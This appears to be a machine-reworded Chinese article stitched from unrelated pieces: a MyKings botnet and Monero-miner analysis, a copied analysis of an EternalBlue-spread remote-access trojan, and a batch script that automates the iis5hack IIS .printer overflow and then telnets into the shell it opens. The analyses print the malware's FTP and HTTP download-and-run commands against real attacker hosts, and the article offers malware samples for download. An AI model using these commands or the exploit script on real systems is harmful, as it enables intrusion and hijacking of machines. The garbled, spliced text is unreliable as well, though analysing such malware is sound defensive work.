*文中中牵涉到的有关系统漏洞已申报生产商并获得修补，文中只限技术性科学研究与探讨，禁止用以不法主要用途，不然造成的一切不良影响自主担负。

MyKings是一个规模性多种僵尸 *** ，并安裝门罗币挖币机，运用服务器空间挖币。

挖币进攻名字 MyKings 涉及到服务平台 Windows平台 有关恶意程序大家族 DDoS、Proxy、RAT、Mirai 进攻通道 根据扫描开放端口，运用系统漏洞和弱口令开展侵入 有关系统漏洞及序号 比特币病毒 叙述介绍 MyKings是一个由好几个子僵尸 *** 组成的多种僵尸 *** ，17年4月底至今，该僵尸 *** 一直积极地扫描互联网技术上1433以及他好几个端口号，并在渗入进到受害人服务器后散播包含DDoS、Proxy、RAT、Miner以内的各种不同主要用途的恶意程序。

图-进攻全过程

图-Payload实行全过程

文件夹名称 作用 c.bat 关闭端口 item.dat 远程控制木马病毒行为主体DLL J脚本 *** (硬编码在Payload中) 完毕特定过程,删除文件夹,运作item.dat cmd批处理命令脚本 *** (Payload连接 *** 获得到运行内存中) 完毕特定过程，删除文件夹，删掉特定帐户运作c.bat、item.dat

表-各一部分作用

依据C:/Windows/System32/b.txt造成的老的联接情况系统日志发觉有很多外发扫描1433端口号分辨可能是根据SQL Server明文密码进去的。

C:/Windows/Temp/conhost.exe源始文件夹名称ups.exe：

服务项目名xWinWpdSrv

印象途径C:/Windows/system/msinfo.exe -s -syn 1000

扫描总体目标IP地址：转化成体制愈来愈繁杂

初期版本号中， msinfo.exe用于扫描的总体目标IP仅有二种：从云空间配置文件wpd.dat获得、在当地依据外网地址出入口IP随机生成；

全新样版中，提升了一种更繁杂的当地随机生成优化算法，而且会绕开一批保留地址段。

关键木马病毒msinfo.exe采用的云空间配置文件wpd.dat，是一个数据加密的XML文本文档，在其中特定了暴破取得成功后用来临免费下载Mirai样版的C2详细地址、必须扫描的 *** 服务端口号、暴破每个端口号需要的动态口令、侵入每个 *** 服务时实行的一部分指令及其必须扫描的总体目标IP范畴等配备。这种配备都能够依据后续僵尸 *** 的规定灵便变更。

模块化设计程序编写构架的msinfo.exe：主要是其Crack控制模块中根据承继一个基类Task_Crack，完成在其中界定好的一组联接、暴破、运行命令等作用的涵数插口就可以界定一个Task_Crack_XXX子类，进而完成对于一个新的 *** 服务的进攻控制模块Crack控制模块与wpd.dat配置文件中界定的待扫描 *** 服务端口号相对性应，能够 灵便变更对于不一样 *** 服务的Crack作用。

别的輔助云空间配置文件：msinfo.exe采用的此外一个輔助木马病毒ups.exe，会涉及到其他云空间配置文件。这种也都能够灵便配备，便捷 *** 攻击操纵在下一阶段必须免费下载哪些本、实行哪些的指令。

名字

起动程序流程

触发器原理

my1

c:/windows/system/my1.bat

每日12点实行

Mysa

cmd.exe>/c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\\windows鶽e.exe>>s&echo bye

开机启动实行

Mysa1

rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa

开机启动实行

Mysa2

cmd.exe /c echo open ftp.ftp0930.host&ampgt;p&ampamp;echo test&ampgt;&ampgt;p&ampamp;echo 1433&ampgt;&ampgt;p&ampamp;echo get s.dat c:\\windows\\debug\\item.dat&ampgt;&ampgt;p&ampamp;echo bye&ampgt;&ampgt;p&ampamp;ftp -s:p

开机启动实行

ok

rundll32.exec:\\windows\\debug\\ok.dat,ServiceMain aaaa

开机启动实行

载入远程控制木马病毒：

木马病毒文档配备服务器防火墙对策，关掉135、137、138、139、445端口，避免 再被别的病毒性感染。

C:/Windows/debug文件目录，门罗币挖币有关的控制模块和配置文件：

门罗币配备config.json

挖矿软件url："pool.minexmr.com:5555"

钱夹详细地址：

pass："x"

C:/Windows/Help文件目录：

C:/Windows/system文件目录。

msinfo.exe病毒孕妈根据申请注册服务项目&载入恶意程序到数据库查询的方式，完成持久化进攻，会联接云空间，自动升级病原体，即时免费下载全新的进攻控制模块。

C:/Windows/system32DOS命令文件目录。

b.txt 端口号联接情况；

a.exe关键作用是完成消除异常木马病毒过程和起动DiskWriter远程控制木马病毒item.dat；

csrse.exe初始文档ups.exe：

C:/Windows/Temp临时性文件名称，被引入的病毒代码实行故意逻辑性关键参考从C&C *** 服务器要求到的配置文件，该文件释放出来到当地后途径为：%SystemRoot%\\Temp

tuser.dat。该文件被异或0x95数据加密过，在应用该文件的时候会对文档开展破译。

破译后的ntuser.dat配备內容，如下图所显示：

ntuser.dat配备內容整体分成2个一部分：main和update。main一部分中的全部ip和网站地址用于免费下载后门病毒有关配备，update一部分中的ip和网站地址用于升级ntuser.dat配备数据信息，要求到的有关配备信息内容迄今仍然在不断升级。免费下载后门病毒配备信息内容cloud.txt的编码逻辑性。

要求到的配备信息内容中，除后门病毒下载链接（exe键名相匹配数据信息）外，也有名叫url的配备项，该作用打开后会hook CreateProcessW被劫持电脑浏览器起动主要参数，但目前该作用并未被打开。配备信息内容，如下图所显示：

恶意程序会根据图中中的下载链接，将后门病毒免费下载到%SystemRoot%\\Temp\\conhost.exe文件目录开展实行。免费下载实行远程控制后门病毒有关逻辑性。

该病原体运作后，更先会释放出来储放有C&C服务器列表的文档（xp.dat）至C:\\Program Files\\Common Files文件目录中，以后向C&C服务器列表中的服务器ip要求xpxmr.dat文档，用以升级C&C服务器列表。要求到的xpxmr.dat文档数据信息应用RSA算法开展过数据加密，开展破译后会再次载入到xpxmr.dat文档中，该文件为密文储放。

病原体在运作时会向C&C *** 服务器要求获得最新病毒版本信息，当检验到存有最新版本时，则会根据C&C服务器下载实行最新版的病毒程序。当后门病毒发觉当今系统软件为64位系统时，还会继续向C&C *** 服务器要求64位版本号的后门病毒到当地开展实行。

接着，病原体会应用详细地址目录中的C&C服务器ip免费下载挖币需要的病原体部件，临时大家发觉会被病毒下载至当地病原体仅具备挖币作用，但我们不清除其未来会免费下载别的病原体控制模块的概率。病原体在下载文件后，会对病原体部件开展md5校检，病原体部件的md5值会参照C&C *** 服务器中的md5.txt文件內容。

在该文件目录下有一个以本机ip取名的txt文件

內容以下：

载入远程控制木马病毒，64base编码解码后获得：

运用regsvr32实行远程控制脚本 *** 指令 /u/s/i: 该txt文件为一个远程控制js脚本 *** ，js脚本 *** 里的标识符都被用16进制开展更换，破译后的js脚本 *** ，其关键作用是免费下载木马病毒文档并实行。

破译后的远程控制脚本 *** ，Upsnew2释放出来远程控制木马病毒item.dat及其c3.bat脚本。

ie临时性文件名称下upsnew2[1].exe，初始文件夹名称ups.exe：

txt最下边是用mimikatz得到的系统软件弱密码：

免费下载Invoke-Mimikatz.ps1脚本 *** ：

要完毕的过程目录：

C:/Windows/Web文件目录：

c3.bat脚本作用以下：

C:\\Program Files\\Common Files文件目录下：

C:/Program Files/文件目录下：

C:/Windows/SysWOW64文件目录下，wpd.dat扫描的总体目标IP从云空间配置文件：

C:/Windows/taidbox/mbrbackup.bin，暗云III v3.0：

暗云III v3.0其进程回调函数 *** 实行步骤以下：

a)启用RtlInitUnicodeString复位csrss.exe；

b)搜索 进程csrss.exe,检测到csrss.exe后则继续下一步；

　　c)感染MBR，并保护1到62扇区的数据，如果试图读前62扇区的数据则会返回正常的数据，如果试图写前62扇区的数据则返回写入的数据进行欺骗，实际没有被写入；

　　d)调用CreateSystemThread创建系统线程,该线程函数主要完成了shellcode下载执行等功能,可拉取任意功能恶意代码进行执行。

　　1.隔离感染主机：已中毒计算机尽快隔离，关闭所有 *** 连接，禁用网卡；

　　2.切断传播途径：从僵尸 *** 当前的攻击重点来看，防范其通过1433端口入侵计算机是非常有必要的。此外，Bot程序还有多种攻击方式尚未使用，这些攻击方式可能在未来的某一天被开启，因此也需要防范可能发生的攻击；

　　3.查找攻击源：加固SQL Server服务器，修补服务器安全漏洞。使用安全的密码策略，使用高强度密码，切勿使用弱口令，防止黑客暴力破解，禁用sa账号；

　　4.查杀病毒：使用管家急救箱进行查杀，下载网址：

　　

　　5.修补漏洞：特别注意445端口的开放情况，如果不需要使用Windows局域网共享服务，可以通过设置防火墙规则来关闭445等端口，并及时打上永恒之蓝MS17-010等漏洞相关补丁；

　　6.注意MSSQL，RDP，Telnet等服务的弱口令问题；

　　7.注意系统账户情况，禁用不必要的账户。

　　1.具备多病毒功能！MiraiXMiner物联网僵尸 *** 攻击来袭

　　

　　2.恶意挖矿攻击的现状、检测及处置

　　

　　3.MyKings：一个大规模多重僵尸 ***

　　

　　4.【木马分析】悄然崛起的挖矿机僵尸 *** ：打服务器挖价值百万门罗币

　　

　　5.MyKings僵尸 *** 最新变种突袭，攻击代码多次加密混淆，难以检测

　　

　　6.弱口令爆破SQL Server服务器 暗云、Mykings、Mirai多个病毒家族结伴来袭

　　

　　7.暗云系列Bootkit木马最新动态

　　

　　8.MyKing黑产团伙最新挖矿活动曝光

　　

　　9.中国黑客利用“永恒之蓝”搜刮肉鸡构建僵尸 ***

　　

　　10.僵尸 *** “Mykings”

　　

　　11.“隐匿者”病毒团伙技术升级传播病毒 暴力入侵电脑威胁全网用户

　　

　　12.彻底曝光黑客组织“隐匿者”：目前作恶最多的 *** 攻击团伙

　　

　　13.代码战争的主阵地——来自终端的威胁情报详述.pdf

　　

　　14.【木马分析】分析利用“永恒之蓝”漏洞传播的RAT

　　

　　暗云III v3.0 、Mykings、Mirai木马样本已放到网盘供学习。

　　链接：

　　提取码：3uoq

　　近日，“永恒之蓝”WanaCry蠕虫勒索病毒肆虐全球，引起了网民高度重视，同时也引起了很多黑客的注意，据瑞星安全研究人员介绍，在众多漏洞利用的攻击者中，发现了一名ip地址位于中国的黑客。该黑客利用“永恒之蓝”漏洞把木马发送到被攻击机器，然后控制机器构建僵尸 *** ，目前已有上千台机器感染，未来还会造成更大的伤害。

　　

　　图：受影响IP全国分布

　　该攻击更先由安全研究人员通过蜜罐捕获。蜜罐捕获到来了自IP 地址182.18.23.38（此ip地址位于中国）的攻击，被攻击端口是445端口，后经分析发现，攻击使用的漏洞正是永恒之蓝漏洞。病毒作者攻击后会发送带有木马程序的Payload，之后Payload下载RAT远控木马实现机器的完全控制，从木马的编译时间来看，还要早于WannaCry。

　　虽然此木马不会像WannaCry一样主动传播，也不会加密计算机中的文件，勒索赎金。但是病毒作者可以使用远控木马，完全控制被攻击计算机。控制计算机之后可以做任何事情。其中就有窃取文件，监控屏幕，监控摄像头，监听麦克风，所以对受害者而言，受到的伤害并不比勒索要小。

　　此外，最近捕获的一些样本表明，泄露的漏洞除了被用于传播勒索病毒，传播木马之外。还有一些攻击者使用泄露的漏洞和攻击武器传播挖矿病毒，使受害者计算机cpu、显卡使用率飙升。导致计算机温度过高，机器严重卡顿，无法完成正常工作。还有一些攻击者，使用漏洞抓肉鸡，组建僵尸 *** 。这些僵尸 *** 可被用来DDOS攻击，对企业、社会造成极大的危害。有数据表明，60%的小企业会在遭受DDOS攻击6个月内倒闭。

　　详细分析

　　攻击者 首先通过 *** 向被攻击目标，发送可以触发漏洞的 *** 数据流。一旦攻击成功，攻击者将通过这条通道，发送一个二进制DLL文件，完成进一步的控制，下文中我们将此文件称作Payload。

　　Payload分析

　　1、攻击过程逻辑如下：

　　

　　图-攻击过程

　　

　　图-Payload执行过程

　　2、病毒各部分功能：

　　文件名

　　功能

　　c.bat

　　关闭端口

　　item.dat

　　远控木马主体DLL

　　J脚本(硬编码在Payload中)

　　结束指定进程,删除文件,运行item.dat

　　cmd批处理脚本(Payload联网获取到内存中)

　　结束指定进程，删除文件，删除指定账户

　　运行c.bat 、item.dat

　　表-各部分功能

　　3、Payload运行之后 首先调用InWMI 函数将硬编码的J脚本注册为WMI中的永久事件消费者。当与其绑定的时间到达时，就会被触发执行预先定义好的J脚本，此方式较为隐蔽。

　　

　　图-注册WMI事件消费者

　　

　　图-硬编码的脚本

　　脚本的功能是：

　　(1)访问指定网页获取要结束的进程列表

　　

　　图-获取进程列表代码

　　网页中的进程列表

　　

　　图-获取到的进程列表

　　进程列表：

　　进程名

　　进程对应的文件路径

　　是否删除文件（0删除文件）

　　ntvdm.exe

　　C:*.exe

　　是

　　mskns.exe

　　c:window *** skns.exe

　　是

　　ntuhost.exe

　　c:windowsntuhost.exe

　　是

　　dwnclear.exe

　　c:windowsdwnclear.exe

　　是

　　isass.exe

　　c:windowsdebugisass.exe

　　是

　　l.exe

　　c:windowszeccl *** .exe

　　是

　　lgnzmq.exe

　　c:windowslgnzmq.exe

　　是

　　asoaui.exe

　　c:windowsasoaui.exe

　　是

　　kxsjitc.exe

　　c:windowsWindowsUpdatekxsjitc.exe.exe

　　是

　　lmudoftzo.exe

　　c:windowsWindowsUpdatelmudoftzo.exe

　　是

　　nczkow.exe

　　c:windowsWindowsUpdatenczkow.exe

　　是

　　 *** ssc.exe

　　c:windowsWindowsUpdatenczkow.exe

　　是

　　ShelReaket.exe

　　c:windowsShelReaket.exe

　　是

　　 *** ms.exe

　　c: *** ms.exe

　　是

　　ntuhost.exe

　　c:windowsntuhost.exe

　　是

　　zovpge.exe

　　c:windowssyswow64zovpge.exe

　　是

　　bivryo.exe

　　c:window *** ivryo.exe

　　是

　　lms.exe

　　c:windowsfontslms.exe

　　是

　　uweueq.exe

　　c:windowsuweueq.exe

　　是

　　vutvec.exe

　　c:windowssystem32.exe

　　是

　　表-结束的进程

　　(2)读取列表，结束指定进程，删除指定文件

　　这些被结束的进程，删除的文件，都是已知的一些病毒常用的名称。作者这样做的目的是为了更加方便的控制受害者的计算机，防止被别的病毒干扰。并且也可以防止别的病毒引起的计算机异常时，受害者排查的时候发现自己。

　　

　　图-结束进程，删除文件

　　(2)下载并运行指定程序

　　访问网页wmi.mykings.top:8888/test.html下载远控木马主体

　　

　　图-下载运行指定程序

　　(4)运行RAT远控木马主体

　　c:windowsdebugitem.dat

　　图-运行远控木马主体

　　至此注册WMI事件的Jscrpit脚本功能完成。

　　4、联网获取控制指令

　　Payload中除了注册WMI之外，还会访问 *** ，获取控制指令

　　首先访问将内容读取到缓冲区中

　　然后解析数据，读取控制指令，根据控制指令执行对应的功能

　　读取到[down]指令

　　则从后面的网址下载文件

　　保存为c:windowsdebugc.bat

　　图-下载c.bat命令

　　c.bat的主要功能是关闭端口，防止利用同样漏洞的病毒再进入受害者计算机，导致自己的远控无法正常工作。

　　

　　图-关闭端口代码

　　读取到[cmd]指令

　　则执行后面的批处理命令

　　

　　图-cmd批处理命令

　　批处理命令的功能和Jcript脚本功能类似，增加删除账户的功能，结束的进程也有变化。

　　删除以下账户

　　asps.xnet

　　IISUSER_ACCOUNTXX

　　IUSR_ADMIN

　　snt0454

　　asp.net

　　aspnet

　　LOCAL_USER

　　表-删除的账户

　　结束指定进程删除文件

　　结束的进程

　　删除的文件

　　Logo1_.exe

　　C:windowsLogo1_.exe

　　Update64.exe

　　c:windowsdellUpdate64.exe

　　misiai.exe

　　misiai.exe c:windowsRichDLLt.dll

　　winhost.exe

　　c:windowswinhost.exe c:windowsupdat.exe

　　netcore.exe

　　c:windowsnetcore.exe

　　ygwmgo.exe

　　c:windowsygwmgo.exe

　　Isass.exe

　　c:windowsdebugIsass.exe

　　winlogon.exe

　　C:windowssystemwinlogon.exe

　　表-结束的进程

　　运行之前[down]命令下载的c:windowsdebugc.bat

　　图-运行c.bat代码

　　运行远控木马主体item.dat

　　图-运行木马主体代码

　　木马主体分析

　　木马主体加了壳，反汇编无效，动态调试也很困难

　　

　　图-加壳信息

　　

　　图-区段信息

　　

　　图-入口代码

　　但是通过字符串和执行的流程，发现了此木马是由开源远程控制软件的代码修改而来

　　开源代码结构：

　　

　　木马运行之后，执行初始化操作，初始化完成之后创建监听线程等待远程控制服务器连接。

　　根据远程发来的指令执行不同的功能。

　　执行流程：

　　

　　图-木马执行流程

　　创建监控线程线程，回调函数中

　　keepAlive 等待控制指令，收到控制指令后根据指令执行对应的功能

　　

　　图-监控线程源码

　　

　　图-监控线程反汇编代码

　　此木马的主要功能有

　　主要功能

　　危害

　　文件管理

　　增删改查受害者计算机的文件

　　进程管理

　　增删改查受害者计算机运行的程序

　　服务管理

　　增删改查受害者计算机的服务

　　窗口管理

　　增删改查受害者计算机的窗口

　　注册表管理

　　增删改查受害者计算机的注册表

　　文件查找

　　查找指定文件

　　超级终端

　　运行命令行

　　键盘监控

　　记录键盘按键

　　视频监控（视频）

　　监控摄像头

　　视频监控（音频）

　　监听麦克风

　　屏幕监控

　　监控计算机屏幕

　　文件下载

　　从受害者计算机中获取文件

　　文件上传

　　发送文件到受害者计算机中

　　执行文件

　　在受害者计算机运行指定程序

　　开启SOCKS服务

　　打开SOCKS

　　执行URL

　　访问网页

　　显示命令

　　受害者机器中弹出对话框

　　访问连接

　　IE浏览器打开发送来的网址

　　更新程序

　　升级木马程序

　　卸载程序

　　窃取信息后，卸载木马，清理作案现场

　　重启机器

　　远程重启受害者机器

　　关闭机器

　　远程关闭受害者机器

　　表-控制码功能

　　对应代码：

　　

　　

　　

　　

　　具体防范防御措施

　　1、安装系统补丁或开启Windows Update。

　　2、在条件允许的情况下，关闭445端口。

　　3、安装、升级专业的防病毒产品，开启全部监控功能。

　　

　　安全优佳

　　

　　

　　这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为：

　　iis5hack

　　目标版本为0-9这10个数字，分别对应不同语言版本和sp的系统版本，我们编制的批处理使用的命令格式为：

　　iis.bat 目标ip [开始版本号]

　　开始版本号可有可无。程序如下。

　　@echo off

　　if "%1"=="" goto help

　　if not EXIST iis5hack.exe goto file

　　ping %1 -n 1 | find "Received=1"

　　if errorlevel 1 goto error

　　rem 如果指定的系统值不合法, 则默认从9开始

　　if "%~2"=="" set beginSys=9 & goto ScanSys

　　if %~2 LSS 9 if %~2 GEQ 0 set beginSys=%~2 & goto ScanSys

　　set beginSys=9

　　:ScanSys

　　rem 开始溢出目标端口80 系统代码9,8,7,...,0 溢出连接端口88

　　rem 在执行结果中查找字符串“good”(溢出成功后才会有字符串good)

　　rem 如果没有错误代码1（溢出成功）就执行telnet段的内容。

　　for /L %%a in (%beginSys%, -1, 0) do (

　　iis5hack %1 80 %%a 88 | find "good"

　　if not errorlevel 1 goto telnet

　　echo 操作系统类型 %%a 失败!

　　)

　　goto error

　　:telnet

　　telnet %1 88

　　goto exit

　　:error

　　echo 可能 *** 不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次!

　　echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口]

　　ECHO 中文: 0

　　ECHO 中文+sp1: 1

　　ECHO 英文: 2

　　ECHO 英文+sp1: 3

　　ECHO 日语: 4

　　ECHO 日语+sp1: 5

　　ECHO 韩文: 6

　　ECHO 韩文+sp1: 7

　　ECHO 墨西哥语: 8

　　ECHO 墨西哥语+sp1: 9

　　goto exit

　　:file

　　echo 文件iis5hack.exe没有发现!程序终止运行!

　　goto exit

　　:help

　　echo 本程序用法如下:

　　echo iis [目标ip]

　　echo iis [目标ip] [开始的号码9-0]

　　:exit